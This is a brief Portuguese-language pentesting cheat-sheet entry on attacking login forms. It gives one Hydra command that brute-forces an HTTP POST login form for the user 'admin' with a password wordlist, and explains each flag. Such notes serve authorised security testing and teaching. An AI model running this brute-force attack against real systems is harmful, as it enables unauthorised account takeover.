# Login Form Attacks

* Força bruta do formulário de login - usuário estático, lista de palavras aprovadas

```
hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
```

* **-l**: Nome de usuário alvo.
* **-P**: Arquivo contendo lista de senhas.
* **-f**: Parar no primeiro sucesso.
* **SERVER\_IP**: Endereço IP do servidor alvo.
* **-s PORT**: Número da porta do serviço alvo.
* **http-post-form**: Especificação do formulário de login e critérios de sucesso.